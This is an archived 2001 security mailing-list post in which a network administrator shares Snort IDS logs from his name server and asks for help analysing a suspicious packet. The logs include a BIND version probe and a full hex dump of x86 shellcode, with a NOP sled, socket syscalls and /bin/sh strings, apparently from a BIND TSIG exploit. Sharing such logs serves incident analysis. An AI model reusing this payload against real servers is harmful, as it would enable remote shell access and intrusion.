Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Named TSIG exploit ?

From: Mihai Moldovanu <mihaim () PROFM RO>
Date: Mon, 5 Feb 2001 20:19:40 +0200
I found on SNORT logs this:

[**] IDS278 - SCAN -named Version probe [**]
02/01-09:30:18.672782 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
len:0x48
141.85.31.233:1024 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0  DF
Len: 38
00 06 01 00 00 01 00 00 00 00 00 00 07 76 65 72  .............ver
73 69 6F 6E 04 62 69 6E 64 00 00 10 00 03        sion.bind.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

[**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**]
02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800
len:0x22A
141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0  DF
Len: 520
00 D0 84 00 00 01 00 00 00 00 00 01 00 CD 80 83  ................
C4 08 3D 04 00 18 01 7C 05 E8 15 00 00 00 E8 80  ..=....|........
00 00 00 E8 53 49 47 4E 41 54 55 52 45 E8 52 53  ....SIGNATURE.RS
41 00 00 EB 34 5E BB 01 00 00 00 89 F1 B8 66 00  A...4^........f.
00 00 CD 80 89 46 14 8D 46 30 89 46 18 31 C0 89  .....F..F0.F.1..
46 20 8D 46 0C 89 46 24 B8 66 00 00 00 BB 0B 00  F .F..F$.f......
00 00 8D 4E 14 CD 80 EB EF E8 C7 FF FF FF 02 00  ...N............
00 00 02 00 00 00 11 00 00 00 02 00 00 35 A1 45  .............5.E
03 96 FF FF FF FF EF FF FF FF 00 04 00 00 00 00  ................
00 00 02 5F 9A 80 10 00 00 00 2F 62 69 6E 2F 73  ..._....../bin/s
68 00 00 EB 37 5E 6A 11 6A 02 6A 02 6A 66 8D 05  h...7^j.j.j.jf..
61 00 00 00 CD 80 89 C2 6A 10 89 F0 50 31 C0 50  a.......j...P1.P
68 24 10 00 00 8D 46 0F 50 52 68 88 00 00 00 8D  h$....F.PRh.....
05 85 00 00 00 CD 80 83 C4 1C EB DC E8 C4 FF FF  ................
FF 00 02 00 35 A1 45 03 96 E8 B1 FF FF FF 2F 62  ....5.E......./b
69 6E 2F 73 68 00 00 90 90 90 90 90 90 90 90 90  in/sh...........
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90  ................
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

The shellcode inside the second packet it's pretty strage . Anyone can
take a deeper look at it ?

Lead programmer,
Mihai Moldovanu (mihaim () profm ro)
WEB:    http://tfm.profm.ro/
             http://www.developers.ro/
Previous By Date Next
Previous By Thread Next

Current thread: